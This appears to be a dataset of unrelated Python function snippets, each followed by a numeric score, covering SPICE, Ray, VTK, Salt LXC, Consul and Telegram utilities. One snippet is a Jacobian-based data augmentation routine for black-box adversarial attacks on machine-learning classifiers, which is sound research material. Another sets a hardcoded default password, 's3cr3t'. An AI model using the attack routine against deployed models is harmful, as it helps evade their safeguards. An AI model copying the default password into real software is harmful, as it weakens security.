reducer = (desc_ensemble[0] - desc_ensemble[1]) * tolerance; desc_ensemble[0] = desc_ensemble[2] + reducer; desc_ensemble[1] = desc_ensemble[2] - reducer; desc_sync_ensembles.append(desc_ensemble); sync_ensembles.append([ index_desc ]); else: oscillator_captured = False; for index_ensemble in range(0, len(sync_ensembles), 1): if ( (desc_sync_ensembles[index_ensemble][0] > descriptors[index_desc][2]) and (desc_sync_ensembles[index_ensemble][1] < descriptors[index_desc][2])): sync_ensembles[index_ensemble].append(index_desc); oscillator_captured = True; break; if (oscillator_captured is False): desc_ensemble = descriptors[index_desc]; reducer = (desc_ensemble[0] - desc_ensemble[1]) * tolerance; desc_ensemble[0] = desc_ensemble[2] + reducer; desc_ensemble[1] = desc_ensemble[2] - reducer; desc_sync_ensembles.append(desc_ensemble); sync_ensembles.append([ index_desc ]); return sync_ensembles;
0.023489
def lstlec(string, n, lenvals, array): """ Given a character string and an ordered array of character strings, find the index of the largest array element less than or equal to the given string. http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lstlec_c.html :param string: Upper bound value to search against. :type string: str :param n: Number elements in array. :type n: int :param lenvals: String length. :type lenvals: int :param array: Array of possible lower bounds. :type array: list :return: index of the last element of array that is lexically less than or equal to string. :rtype: int """ string = stypes.stringToCharP(string) array = stypes.listToCharArrayPtr(array, xLen=lenvals, yLen=n) n = ctypes.c_int(n) lenvals = ctypes.c_int(lenvals) return libspice.lstlec_c(string, n, lenvals, array)
0.001087
def ip_address(self, container: Container ) -> Union[IPv4Address, IPv6Address]: """ The IP address used by a given container, or None if no IP address has been assigned to that container. """ r = self.__api.get('containers/{}/ip'.format(container.uid)) if r.status_code == 200: return r.json() self.__api.handle_erroneous_response(r)
0.009112
def cache_return(func):
    """Cache the return value of a function without arguments"""
    _cache = []

    def wrap():
        if not _cache:
            _cache.append(func())
        return _cache[0]
    return wrap
0.004545
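A usage sketch for cache_return showing that the wrapped function body runs exactly once (the decorator is repeated from the row above so this runs standalone):

```python
def cache_return(func):
    _cache = []
    def wrap():
        if not _cache:            # first call: compute and store
            _cache.append(func())
        return _cache[0]          # later calls: reuse the stored value
    return wrap

calls = []

@cache_return
def expensive():
    calls.append(1)
    return 42

print(expensive(), expensive(), len(calls))  # 42 42 1
```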
def get_gpu_ids(): """Get the IDs of the GPUs that are available to the worker. If the CUDA_VISIBLE_DEVICES environment variable was set when the worker started up, then the IDs returned by this method will be a subset of the IDs in CUDA_VISIBLE_DEVICES. If not, the IDs will fall in the range [0, NUM_GPUS - 1], where NUM_GPUS is the number of GPUs that the node has. Returns: A list of GPU IDs. """ if _mode() == LOCAL_MODE: raise Exception("ray.get_gpu_ids() currently does not work in PYTHON " "MODE.") all_resource_ids = global_worker.raylet_client.resource_ids() assigned_ids = [ resource_id for resource_id, _ in all_resource_ids.get("GPU", []) ] # If the user had already set CUDA_VISIBLE_DEVICES, then respect that (in # the sense that only GPU IDs that appear in CUDA_VISIBLE_DEVICES should be # returned). if global_worker.original_gpu_ids is not None: assigned_ids = [ global_worker.original_gpu_ids[gpu_id] for gpu_id in assigned_ids ] return assigned_ids
0.000899
def list_files(self, prefix, flat=False): """ List the files in the layer with the given prefix. flat means only generate one level of a directory, while non-flat means generate all file paths with that prefix. """ layer_path = self.get_path_to_file("") path = os.path.join(layer_path, prefix) for blob in self._bucket.list_blobs(prefix=path): filename = blob.name.replace(layer_path, '') if not flat and filename[-1] != '/': yield filename elif flat and '/' not in blob.name.replace(path, ''): yield filename
0.011864
def FindAll(params, ctxt, scope, stream, coord, interp): """ This function converts the argument data into a set of hex bytes and then searches the current file for all occurrences of those bytes. data may be any of the basic types or an array of one of the types. If data is an array of signed bytes, it is assumed to be a null-terminated string. To search for an array of hex bytes, create an unsigned char array and fill it with the target value. If the type being search for is a string, the matchcase and wholeworld arguments can be used to control the search (see Using Find for more information). method controls which search method is used from the following options: FINDMETHOD_NORMAL=0 - a normal search FINDMETHOD_WILDCARDS=1 - when searching for strings use wildcards '*' or '?' FINDMETHOD_REGEX=2 - when searching for strings use Regular Expressions wildcardMatchLength indicates the maximum number of characters a '*' can match when searching using wildcards. If the target is a float or double, the tolerance argument indicates that values that are only off by the tolerance value still match. If dir is 1 the find direction is down and if dir is 0 the find direction is up. start and size can be used to limit the area of the file that is searched. start is the starting byte address in the file where the search will begin and size is the number of bytes after start that will be searched. If size is zero, the file will be searched from start to the end of the file. The return value is a TFindResults structure. This structure contains a count variable indicating the number of matches, and a start array holding an array of starting positions, plus a size array which holds an array of target lengths. For example, use the following code to find all occurrences of the ASCII string "Test" in a file: """ matches_iter = _find_helper(params, ctxt, scope, stream, coord, interp) matches = list(matches_iter) types = interp.get_types() res = types.TFindResults() res.count = len(matches) # python3 map doesn't return a list starts = list(map(lambda m: m.start()+FIND_MATCHES_START_OFFSET, matches)) res.start = starts # python3 map doesn't return a list sizes = list(map(lambda m: m.end()-m.start(), matches)) res.size = sizes return res
0.001682
def image(self): """ Returns an image array of current render window """ if not hasattr(self, 'ren_win') and hasattr(self, 'last_image'): return self.last_image ifilter = vtk.vtkWindowToImageFilter() ifilter.SetInput(self.ren_win) ifilter.ReadFrontBufferOff() if self.image_transparent_background: ifilter.SetInputBufferTypeToRGBA() else: ifilter.SetInputBufferTypeToRGB() return self._run_image_filter(ifilter)
0.003914
def kwargs_mutual_exclusive(param1_name, param2_name, map2to1=None):
    """If there exist mutually exclusive parameters, checks for them and
    maps param2 to param1."""
    def wrapper(func):
        @functools.wraps(func)
        def new_func(*args, **kwargs):
            if param2_name in kwargs:
                if param1_name in kwargs:
                    raise ValueError('You cannot specify `%s` and `%s` at the same time, '
                                     'they are mutually exclusive.' % (param1_name, param2_name))
                param2 = kwargs.pop(param2_name)
                if map2to1 is not None:
                    param1 = map2to1(param2)
                else:
                    param1 = param2
                kwargs[param1_name] = param1
            return func(*args, **kwargs)
        return new_func
    return wrapper
0.004717
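A usage sketch with hypothetical radius/diameter parameters, assuming the kwargs_mutual_exclusive decorator from the row above is in scope:

```python
@kwargs_mutual_exclusive('radius', 'diameter', map2to1=lambda d: d / 2)
def area(radius):
    return 3.14159 * radius ** 2

print(area(diameter=4))          # diameter is mapped to radius=2
try:
    area(radius=2, diameter=4)   # passing both raises ValueError
except ValueError as e:
    print(e)
```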
def add_axes_at_origin(self): """ Add axes actor at origin Returns -------- marker_actor : vtk.vtkAxesActor vtkAxesActor actor """ self.marker_actor = vtk.vtkAxesActor() # renderer = self.renderers[self.loc_to_index(loc)] self.AddActor(self.marker_actor) self.parent._actors[str(hex(id(self.marker_actor)))] = self.marker_actor return self.marker_actor
0.006623
def get_version_rank(version): """ Converts a version string to it's rank. Usage:: >>> get_version_rank("4.2.8") 4002008000000 >>> get_version_rank("4.0") 4000000000000 >>> get_version_rank("4.2.8").__class__ <type 'int'> :param version: Current version to calculate rank. :type version: unicode :return: Rank. :rtype: int """ tokens = list(foundations.common.unpack_default(filter(any, re.split("\.|-|,", version)), length=4, default=0)) rank = sum((int(1000 ** i) * int(tokens[-i]) for i in range(len(tokens), 0, -1))) LOGGER.debug("> Rank: '{0}'.".format(rank)) return rank
0.005917
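get_version_rank is a base-1000 positional encoding of up to four version components, so ranks compare like versions. A simplified standalone sketch that replaces foundations.common.unpack_default with plain padding:

```python
import re

def version_rank(version):
    """Map a dotted version string to a sortable integer."""
    tokens = [t for t in re.split(r'\.|-|,', version) if t]
    tokens += ['0'] * (4 - len(tokens))       # pad to four components
    return sum(1000 ** i * int(tokens[-i]) for i in range(len(tokens), 0, -1))

print(version_rank('4.2.8'))                        # 4002008000000
print(version_rank('4.0') < version_rank('4.2.8'))  # True
```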
def set_restriction(self, command, user, event_types): """ Adds restriction for given `command`. :param command: command on which the restriction should be set. :type command: str :param user: username for which the restriction applies. :type user: str :param event_types: types of events for which the command is allowed. :type event_types: list """ self.commands_rights[command][user.lower()] = event_types if command not in self.triggers: self.triggers[command] = [EVT_PUBLIC, EVT_PRIVATE, EVT_NOTICE] if not hasattr(self, command): setattr(self, command, lambda msg: self.handle_rights(msg))
0.002793
def addPhoto(self, photo):
    """Add a photo to this set.

    photo - the photo
    """
    method = 'flickr.photosets.addPhoto'
    _dopost(method, auth=True, photoset_id=self.id, photo_id=photo.id)
    self.__count += 1
    return True
0.007435
async def disable(self, reason=None):
    """Enters maintenance mode

    Parameters:
        reason (str): Reason for disabling
    Returns:
        bool: ``True`` on success
    """
    params = {"enable": True, "reason": reason}
    response = await self._api.put("/v1/agent/maintenance", params=params)
    return response.status == 200
0.005333
def _get_updated_values(before_values, after_values):
    """Get updated values from 2 dicts of values

    Args:
        before_values (dict): values before update
        after_values (dict): values after update

    Returns:
        dict: a diff dict whose keys are the changed field keys and whose
        values are ``[before_value, after_value]`` pairs
    """
    assert before_values.keys() == after_values.keys()
    return dict([(k, [before_values[k], after_values[k]])
                 for k in before_values.keys()
                 if before_values[k] != after_values[k]])
0.001776
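A quick demonstration of the diff helper above (repeated without the leading underscore so the sketch runs standalone):

```python
def get_updated_values(before, after):
    assert before.keys() == after.keys()
    return {k: [before[k], after[k]] for k in before if before[k] != after[k]}

before = {'name': 'alice', 'age': 30, 'city': 'Oslo'}
after = {'name': 'alice', 'age': 31, 'city': 'Bergen'}
print(get_updated_values(before, after))
# {'age': [30, 31], 'city': ['Oslo', 'Bergen']}
```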
def clear(self):
    """
    Clears the field represented by this element

    @rtype: WebElementWrapper
    @return: Returns itself
    """
    def clear_element():
        """Wrapper to clear element"""
        return self.element.clear()

    self.execute_and_handle_webelement_exceptions(clear_element, 'clear')
    return self
0.004963
def addReadGroupSet(self): """ Adds a new ReadGroupSet into this repo. """ self._openRepo() dataset = self._repo.getDatasetByName(self._args.datasetName) dataUrl = self._args.dataFile indexFile = self._args.indexFile parsed = urlparse.urlparse(dataUrl) # TODO, add https support and others when they have been # tested. if parsed.scheme in ['http', 'ftp']: if indexFile is None: raise exceptions.MissingIndexException(dataUrl) else: if indexFile is None: indexFile = dataUrl + ".bai" dataUrl = self._getFilePath(self._args.dataFile, self._args.relativePath) indexFile = self._getFilePath(indexFile, self._args.relativePath) name = self._args.name if self._args.name is None: name = getNameFromPath(dataUrl) readGroupSet = reads.HtslibReadGroupSet(dataset, name) readGroupSet.populateFromFile(dataUrl, indexFile) referenceSetName = self._args.referenceSetName if referenceSetName is None: # Try to find a reference set name from the BAM header. referenceSetName = readGroupSet.getBamHeaderReferenceSetName() referenceSet = self._repo.getReferenceSetByName(referenceSetName) readGroupSet.setReferenceSet(referenceSet) readGroupSet.setAttributes(json.loads(self._args.attributes)) self._updateRepo(self._repo.insertReadGroupSet, readGroupSet)
0.001273
def get_satellites_by_type(self, s_type):
    """Generic function to access one of the satellite attribute
    ie : self.pollers, self.reactionners ...

    :param s_type: satellite type wanted
    :type s_type: str
    :return: self.*type*s
    :rtype: list
    """
    if hasattr(self, s_type + 's'):
        return getattr(self, s_type + 's')

    logger.debug("[realm %s] do not have this kind of satellites: %s", self.name, s_type)
    return []
0.006061
def jacobian_augmentation(sess, x, X_sub_prev, Y_sub, grads, lmbda, aug_batch_size=512, feed=None): """ Augment an adversary's substitute training set using the Jacobian of a substitute model to generate new synthetic inputs. See https://arxiv.org/abs/1602.02697 for more details. See cleverhans_tutorials/mnist_blackbox.py for example use case :param sess: TF session in which the substitute model is defined :param x: input TF placeholder for the substitute model :param X_sub_prev: substitute training data available to the adversary at the previous iteration :param Y_sub: substitute training labels available to the adversary at the previous iteration :param grads: Jacobian symbolic graph for the substitute (should be generated using utils_tf.jacobian_graph) :return: augmented substitute data (will need to be labeled by oracle) """ assert len(x.get_shape()) == len(np.shape(X_sub_prev)) assert len(grads) >= np.max(Y_sub) + 1 assert len(X_sub_prev) == len(Y_sub) aug_batch_size = min(aug_batch_size, X_sub_prev.shape[0]) # Prepare input_shape (outside loop) for feeding dictionary below input_shape = list(x.get_shape()) input_shape[0] = 1 # Create new numpy array for adversary training data # with twice as many components on the first dimension. X_sub = np.vstack([X_sub_prev, X_sub_prev]) num_samples = X_sub_prev.shape[0] # Creating and processing as batch for p_idxs in range(0, num_samples, aug_batch_size): X_batch = X_sub_prev[p_idxs:p_idxs + aug_batch_size, ...] feed_dict = {x: X_batch} if feed is not None: feed_dict.update(feed) # Compute sign matrix grad_val = sess.run([tf.sign(grads)], feed_dict=feed_dict)[0] # Create new synthetic point in adversary substitute training set for (indx, ind) in zip(range(p_idxs, p_idxs + X_batch.shape[0]), range(X_batch.shape[0])): X_sub[num_samples + indx] = ( X_batch[ind] + lmbda * grad_val[Y_sub[indx], ind, ...]) # Return augmented training data (needs to be labeled afterwards) return X_sub
0.008158
def sample(self):
    '''Returns the stream's rows used as sample.

    These sample rows are used internally to infer characteristics of the
    source file (e.g. encoding, headers, ...).
    '''
    sample = []
    iterator = iter(self.__sample_extended_rows)
    iterator = self.__apply_processors(iterator)
    for row_number, headers, row in iterator:
        sample.append(row)
    return sample
0.004535
def _regroup(self): """Update the output :math:`g` keeping the map :math:`\pi` fixed. Compute the KL between all input and output components. """ # clean up old maps for j in range(self.nout): self.inv_map[j] = [] # find smallest divergence between input component i # and output component j of the cluster mixture density for i in range(self.nin): self.min_kl[i] = np.inf j_min = None for j in range(self.nout): kl = kullback_leibler(self.f.components[i], self.g.components[j]) if kl < self.min_kl[i]: self.min_kl[i] = kl j_min = j assert j_min is not None self.inv_map[j_min].append(i)
0.005019
def sentence(random=random, *args, **kwargs):
    """
    Return a whole sentence

    >>> mock_random.seed(0)
    >>> sentence(random=mock_random)
    "Agatha Incrediblebritches can't wait to smell two chimps in Boatbencheston."
    >>> mock_random.seed(2)
    >>> sentence(random=mock_random, slugify=True)
    'blistersecret-studios-is-the-best-company-in-liveronion'
    """
    if 'name' in kwargs and kwargs['name']:
        nm = kwargs['name']
    elif random.choice([True, False, False]):
        nm = name(capitalize=True, random=random)
    else:
        nm = random.choice(people)

    def type_one():
        return "{name} will {verb} {thing}.".format(
            name=nm, verb=verb(random=random),
            thing=random.choice([a_thing(random=random), things(random=random)]))

    def type_two():
        return "{city} is in {country}.".format(
            city=city(capitalize=True, random=random),
            country=country(capitalize=True, random=random))

    def type_three():
        return "{name} can't wait to {verb} {thing} in {city}.".format(
            name=nm, verb=verb(random=random), thing=a_thing(random=random),
            city=city(capitalize=True, random=random))

    def type_four():
        return "{name} will head to {company} to buy {thing}.".format(
            name=nm, company=company(capitalize=True, random=random),
            thing=a_thing(random=random))

    def type_five():
        return "{company} is the best company in {city}.".format(
            city=city(capitalize=True, random=random),
            company=company(capitalize=True, random=random))

    def type_six():
        return "To get to {country}, you need to go to {city}, then drive {direction}.".format(
            country=country(capitalize=True, random=random),
            city=city(capitalize=True, random=random),
            direction=direction(random=random))

    def type_seven():
        return "{name} needs {thing}, badly.".format(
            name=nm, thing=a_thing(random=random))

    def type_eight():
        return "{verb} {noun}!".format(
            verb=verb(capitalize=True, random=random), noun=noun(random=random))

    return random.choice([type_one, type_two, type_three, type_four,
                          type_five, type_six, type_seven, type_eight])()
0.00744
def _wait_response(self, message):
    """
    Private function to get responses from the server.

    :param message: the received message
    """
    if message is None or message.code != defines.Codes.CONTINUE.number:
        self.queue.put(message)
0.007246
def appendData(self, content):
    """
    Add characters to the element's pcdata.
    """
    if self.pcdata is not None:
        self.pcdata += content
    else:
        self.pcdata = content
0.052023
def context_list(zap_helper):
    """List the available contexts."""
    contexts = zap_helper.zap.context.context_list
    if len(contexts):
        console.info('Available contexts: {0}'.format(contexts[1:-1]))
    else:
        console.info('No contexts available in the current session')
0.003436
def search_host_and_dispatch(self, host_name, command, extcmd): # pylint: disable=too-many-branches """Try to dispatch a command for a specific host (so specific scheduler) because this command is related to a host (change notification interval for example) :param host_name: host name to search :type host_name: str :param command: command line :type command: str :param extcmd: external command object (the object will be added to sched commands list) :type extcmd: alignak.external_command.ExternalCommand :return: None """ logger.debug("Calling search_host_and_dispatch for %s", host_name) host_found = False # If we are a receiver, just look in the receiver if self.mode == 'receiver': logger.debug("Receiver is searching a scheduler for the external command %s %s", host_name, command) scheduler_link = self.daemon.get_scheduler_from_hostname(host_name) if scheduler_link: host_found = True logger.debug("Receiver pushing external command to scheduler %s", scheduler_link.name) scheduler_link.pushed_commands.append(extcmd) else: logger.warning("I did not found a scheduler for the host: %s", host_name) else: for cfg_part in list(self.cfg_parts.values()): if cfg_part.hosts.find_by_name(host_name) is not None: logger.debug("Host %s found in a configuration", host_name) if cfg_part.is_assigned: host_found = True scheduler_link = cfg_part.scheduler_link logger.debug("Sending command to the scheduler %s", scheduler_link.name) scheduler_link.push_external_commands([command]) # scheduler_link.my_daemon.external_commands.append(command) break else: logger.warning("Problem: the host %s was found in a configuration, " "but this configuration is not assigned to any scheduler!", host_name) if not host_found: if self.accept_passive_unknown_check_results: brok = self.get_unknown_check_result_brok(command) if brok: self.send_an_element(brok) else: logger.warning("External command was received for the host '%s', " "but the host could not be found! Command is: %s", host_name, command) else: logger.warning("External command was received for host '%s', " "but the host could not be found!", host_name)
0.004704
def regex_in_package_file(regex, filename, package_name, return_match=False):
    """
    Search for a regex in a file contained within the package directory

    If return_match is True, return the found object instead of a boolean
    """
    filepath = package_file_path(filename, package_name)
    return regex_in_file(regex, filepath, return_match=return_match)
0.002762
def get_extension(media):
    """Gets the corresponding extension for any Telegram media."""
    # Photos are always compressed as .jpg by Telegram
    if isinstance(media, (types.UserProfilePhoto,
                          types.ChatPhoto, types.MessageMediaPhoto)):
        return '.jpg'

    # Documents will come with a mime type
    if isinstance(media, types.MessageMediaDocument):
        media = media.document
    if isinstance(media, (
            types.Document, types.WebDocument, types.WebDocumentNoProxy)):
        if media.mime_type == 'application/octet-stream':
            # Octet stream are just bytes, which have no default extension
            return ''
        else:
            return guess_extension(media.mime_type) or ''

    return ''
0.001311
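The document branch above falls back to mime-type guessing; a small sketch of that fallback using the standard library (octet-stream deliberately maps to no extension):

```python
from mimetypes import guess_extension

for mime in ('image/png', 'video/mp4', 'application/octet-stream'):
    ext = '' if mime == 'application/octet-stream' else (guess_extension(mime) or '')
    print(mime, '->', repr(ext))
```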
def cloud_init_interface(name, vm_=None, **kwargs):
    '''
    Interface between salt.cloud.lxc driver and lxc.init
    ``vm_`` is a mapping of vm opts in the salt.cloud format
    as documented for the lxc driver.

    This can be used either:

    - from the salt cloud driver
    - because you find the argument to give easier here
      than using directly lxc.init

    .. warning::
        BE REALLY CAREFUL CHANGING DEFAULTS !!!
        IT'S A RETRO COMPATIBLE INTERFACE WITH
        THE SALT CLOUD DRIVER (ask kiorky).

    name
        name of the lxc container to create
    pub_key
        public key to preseed the minion with.
        Can be the keycontent or a filepath
    priv_key
        private key to preseed the minion with.
        Can be the keycontent or a filepath
    path
        path to the container parent directory (default: /var/lib/lxc)

        .. versionadded:: 2015.8.0

    profile
        :ref:`profile <tutorial-lxc-profiles-container>` selection
    network_profile
        :ref:`network profile <tutorial-lxc-profiles-network>` selection
    nic_opts
        per interface settings compatible with
        network profile (ipv4/ipv6/link/gateway/mac/netmask)

        eg::

              - {'eth0': {'mac': '00:16:3e:01:29:40',
                          'gateway': None, (default)
                          'link': 'br0', (default)
                          'netmask': '', (default)
                          'ip': '22.1.4.25'}}
    unconditional_install
        given to lxc.bootstrap (see relative doc)
    force_install
        given to lxc.bootstrap (see relative doc)
    config
        any extra argument for the salt minion config
    dnsservers
        list of DNS servers to set inside the container
    dns_via_dhcp
        do not set the dns servers, let them be set by the dhcp.
    autostart
        autostart the container at boot time
    password
        administrative password for the container
    bootstrap_delay
        delay before launching bootstrap script at Container init

    .. warning::

        Legacy but still supported options:

        from_container
            which container we use as a template
            when running lxc.clone
        image
            which template do we use when we
            are using lxc.create. This is the default
            mode unless you specify something in from_container
        backing
            which backing store to use.
            Values can be: overlayfs, dir(default), lvm, zfs, btrfs
        fstype
            When using a blockdevice level backing store,
            which filesystem to use on
        size
            When using a blockdevice level backing store,
            which size for the filesystem to use on
        snapshot
            Use snapshot when cloning the container source
        vgname
            if using LVM: vgname
        lvname
            if using LVM: lvname
        thinpool
            if using LVM: thinpool
        ip
            ip for the primary nic
        mac
            mac address for the primary nic
        netmask
            netmask for the primary nic (24)
            = ``vm_.get('netmask', '24')``
        bridge
            bridge for the primary nic (lxcbr0)
        gateway
            network gateway for the container
        additional_ips
            additional ips which will be wired on the main bridge (br0)
            which is connected to internet.
            Be aware that you may use manual virtual mac addresses
            provided by your provider (online, ovh, etc).
            This is a list of mappings {ip: '', mac: '', netmask: ''}
            Set gateway to None and an interface with a gateway
            to escape from another interface than eth0.

            eg::

                  - {'mac': '00:16:3e:01:29:40',
                     'gateway': None, (default)
                     'link': 'br0', (default)
                     'netmask': '', (default)
                     'ip': '22.1.4.25'}
        users
            administrative users for the container
            default: [root] and [root, ubuntu] on ubuntu
        default_nic
            name of the first interface, you should
            really not override this

    CLI Example:

    .. code-block:: bash

        salt '*' lxc.cloud_init_interface foo
    '''
    if vm_ is None:
        vm_ = {}
    vm_ = copy.deepcopy(vm_)
    vm_ = salt.utils.dictupdate.update(vm_, kwargs)

    profile_data = copy.deepcopy(
        vm_.get('lxc_profile',
                vm_.get('profile', {})))
    if not isinstance(profile_data, (dict, six.string_types)):
        profile_data = {}
    profile = get_container_profile(profile_data)

    def _cloud_get(k, default=None):
        return vm_.get(k, profile.get(k, default))

    if name is None:
        name = vm_['name']
    # if we are on ubuntu, default to ubuntu
    default_template = ''
    if __grains__.get('os', '') in ['Ubuntu']:
        default_template = 'ubuntu'
    image = _cloud_get('image')
    if not image:
        _cloud_get('template', default_template)
    backing = _cloud_get('backing', 'dir')
    if image:
        profile['template'] = image
    vgname = _cloud_get('vgname', None)
    if vgname:
        profile['vgname'] = vgname
    if backing:
        profile['backing'] = backing
    snapshot = _cloud_get('snapshot', False)
    autostart = bool(_cloud_get('autostart', True))
    dnsservers = _cloud_get('dnsservers', [])
    dns_via_dhcp = _cloud_get('dns_via_dhcp', True)
    password = _cloud_get('password', 's3cr3t')
    password_encrypted = _cloud_get('password_encrypted', False)
    fstype = _cloud_get('fstype', None)
    lvname = _cloud_get('lvname', None)
    thinpool = _cloud_get('thinpool', None)
    pub_key = _cloud_get('pub_key', None)
    priv_key = _cloud_get('priv_key', None)
    size = _cloud_get('size', '20G')
    script = _cloud_get('script', None)
    script_args = _cloud_get('script_args', None)
    users = _cloud_get('users', None)
    if users is None:
        users = []
    ssh_username = _cloud_get('ssh_username', None)
    if ssh_username and (ssh_username not in users):
        users.append(ssh_username)
    network_profile = _cloud_get('network_profile', None)
    nic_opts = kwargs.get('nic_opts', None)
    netmask = _cloud_get('netmask', '24')
    path = _cloud_get('path', None)
    bridge = _cloud_get('bridge', None)
    gateway = _cloud_get('gateway', None)
    unconditional_install = _cloud_get('unconditional_install', False)
    force_install = _cloud_get('force_install', True)
    config = _get_salt_config(_cloud_get('config', {}), **vm_)
    default_nic = _cloud_get('default_nic', DEFAULT_NIC)
    # do the interface with lxc.init mainly via nic_opts
    # to avoid extra and confusing extra use cases.
    if not isinstance(nic_opts, dict):
        nic_opts = salt.utils.odict.OrderedDict()
    # have a reference to the default nic
    eth0 = nic_opts.setdefault(default_nic,
                               salt.utils.odict.OrderedDict())
    # lxc config is based of ifc order, be sure to use odicts.
    if not isinstance(nic_opts, salt.utils.odict.OrderedDict):
        bnic_opts = salt.utils.odict.OrderedDict()
        bnic_opts.update(nic_opts)
        nic_opts = bnic_opts
    gw = None
    # legacy salt.cloud scheme for network interfaces settings support
    bridge = _cloud_get('bridge', None)
    ip = _cloud_get('ip', None)
    mac = _cloud_get('mac', None)
    if ip:
        fullip = ip
        if netmask:
            fullip += '/{0}'.format(netmask)
        eth0['ipv4'] = fullip
        if mac is not None:
            eth0['mac'] = mac
    for ix, iopts in enumerate(_cloud_get("additional_ips", [])):
        ifh = "eth{0}".format(ix + 1)
        ethx = nic_opts.setdefault(ifh, {})
        if gw is None:
            gw = iopts.get('gateway', ethx.get('gateway', None))
            if gw:
                # only one and only one default gateway is allowed !
                eth0.pop('gateway', None)
                gateway = None
                # even if the gateway is on the default "eth0" nic
                # and we popped it, it will work
                # as we reinject or set it here.
                ethx['gateway'] = gw
        elink = iopts.get('link', ethx.get('link', None))
        if elink:
            ethx['link'] = elink
        # allow dhcp
        aip = iopts.get('ipv4', iopts.get('ip', None))
        if aip:
            ethx['ipv4'] = aip
        nm = iopts.get('netmask', '')
        if nm:
            ethx['ipv4'] += '/{0}'.format(nm)
        for i in ('mac', 'hwaddr'):
            if i in iopts:
                ethx['mac'] = iopts[i]
                break
        if 'mac' not in ethx:
            ethx['mac'] = salt.utils.network.gen_mac()
    # last round checking for unique gateway and such
    gw = None
    for ethx in [a for a in nic_opts]:
        ndata = nic_opts[ethx]
        if gw:
            ndata.pop('gateway', None)
        if 'gateway' in ndata:
            gw = ndata['gateway']
            gateway = None
    # only use a default bridge / gateway if we configured them
    # via the legacy salt cloud configuration style.
    # In other cases, we should rely on settings provided by the new
    # salt lxc network profile style configuration, which can
    # also be overridden on a per interface basis via the nic_opts dict.
    if bridge:
        eth0['link'] = bridge
    if gateway:
        eth0['gateway'] = gateway

    lxc_init_interface = {}
    lxc_init_interface['name'] = name
    lxc_init_interface['config'] = config
    lxc_init_interface['memory'] = _cloud_get('memory', 0)  # nolimit
    lxc_init_interface['pub_key'] = pub_key
    lxc_init_interface['priv_key'] = priv_key
    lxc_init_interface['nic_opts'] = nic_opts
    for clone_from in ['clone_from', 'clone', 'from_container']:
        # clone_from should default to None if not available
        lxc_init_interface['clone_from'] = _cloud_get(clone_from, None)
        if lxc_init_interface['clone_from'] is not None:
            break
    lxc_init_interface['profile'] = profile
    lxc_init_interface['snapshot'] = snapshot
    lxc_init_interface['dnsservers'] = dnsservers
    lxc_init_interface['fstype'] = fstype
    lxc_init_interface['path'] = path
    lxc_init_interface['vgname'] = vgname
    lxc_init_interface['size'] = size
    lxc_init_interface['lvname'] = lvname
    lxc_init_interface['thinpool'] = thinpool
    lxc_init_interface['force_install'] = force_install
    lxc_init_interface['unconditional_install'] = unconditional_install
    lxc_init_interface['bootstrap_url'] = script
    lxc_init_interface['bootstrap_args'] = script_args
    lxc_init_interface['bootstrap_shell'] = _cloud_get('bootstrap_shell', 'sh')
    lxc_init_interface['bootstrap_delay'] = _cloud_get('bootstrap_delay', None)
    lxc_init_interface['autostart'] = autostart
    lxc_init_interface['users'] = users
    lxc_init_interface['password'] = password
    lxc_init_interface['password_encrypted'] = password_encrypted
    # be sure not to let objects go inside the return
    # as this return will be msgpacked for use in the runner !
    lxc_init_interface['network_profile'] = network_profile
    for i in ['cpu', 'cpuset', 'cpushare']:
        if _cloud_get(i, None):
            try:
                lxc_init_interface[i] = vm_[i]
            except KeyError:
                lxc_init_interface[i] = profile[i]
    return lxc_init_interface
0.000086
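The trickiest part of the function above is the wiring of the legacy ip/netmask/additional_ips options into nic_opts. A minimal standalone sketch of that mapping, using a hypothetical build_nic_opts helper outside of Salt (plain collections.OrderedDict instead of salt.utils.odict):

from collections import OrderedDict

def build_nic_opts(ip=None, netmask='24', additional_ips=()):
    nic_opts = OrderedDict()
    eth0 = nic_opts.setdefault('eth0', OrderedDict())
    if ip:
        # the legacy ip/netmask pair becomes a CIDR string on the default nic
        eth0['ipv4'] = '{0}/{1}'.format(ip, netmask) if netmask else ip
    for ix, iopts in enumerate(additional_ips):
        # each extra mapping is wired onto eth1, eth2, ...
        ethx = nic_opts.setdefault('eth{0}'.format(ix + 1), OrderedDict())
        aip = iopts.get('ipv4', iopts.get('ip'))
        if aip:
            ethx['ipv4'] = aip
    return nic_opts

print(build_nic_opts(ip='22.1.4.25',
                     additional_ips=[{'ip': '10.0.0.2'}]))
# OrderedDict([('eth0', OrderedDict([('ipv4', '22.1.4.25/24')])),
#              ('eth1', OrderedDict([('ipv4', '10.0.0.2')]))])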
def get_asset_contents(self): """Gets the content of this asset. return: (osid.repository.AssetContentList) - the asset contents raise: OperationFailed - unable to complete request *compliance: mandatory -- This method must be implemented.* """ # Implemented from template for osid.repository.Asset.get_asset_contents_template return AssetContentList( self._my_map['assetContents'], runtime=self._runtime, proxy=self._proxy)
0.00578
def pretty_const(value): """Make a constant pretty for printing in GUI""" words = value.split('_') pretty = words[0].capitalize() for word in words[1:]: pretty += ' ' + word.lower() return pretty
0.004484
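A quick usage illustration for pretty_const:

# splits on underscores, capitalizes the first word, lowercases the rest
print(pretty_const('MAX_RETRY_COUNT'))  # Max retry count
print(pretty_const('OK'))               # Ok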
def handle_event(self, event): """ When we get an 'event' type from the bridge handle it by invoking the handler and if needed sending back the result. """ result_id, ptr, method, args = event[1] obj = None result = None try: obj, handler = bridge.get_handler(ptr, method) result = handler(*[v for t, v in args]) except bridge.BridgeReferenceError as e: #: Log the event, don't blow up here msg = "Error processing event: {} - {}".format( event, e).encode("utf-8") print(msg) self.show_error(msg) except: #: Log the event, blow up in user's face msg = "Error processing event: {} - {}".format( event, traceback.format_exc()).encode("utf-8") print(msg) self.show_error(msg) raise finally: if result_id: if hasattr(obj, '__nativeclass__'): sig = getattr(type(obj), method).__returns__ else: sig = type(result).__name__ self.send_event( bridge.Command.RESULT, #: method result_id, bridge.msgpack_encoder(sig, result) #: args )
0.002926
def SympyCreate(n): """Creation operator for a Hilbert space of dimension `n`, as an instance of `sympy.Matrix`""" a = sympy.zeros(n) for i in range(1, n): a += sympy.sqrt(i) * basis_state(i, n) * basis_state(i-1, n).H return a
0.003922
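The snippet relies on a basis_state helper defined elsewhere in its module. A self-contained sketch, assuming basis_state(i, n) returns the i-th standard basis column vector:

import sympy

def basis_state(i, n):
    # assumed behaviour: n x 1 column vector with a 1 at position i
    e = sympy.zeros(n, 1)
    e[i] = 1
    return e

# for n=3 the creation operator has sqrt(1), sqrt(2) on the subdiagonal
print(SympyCreate(3))
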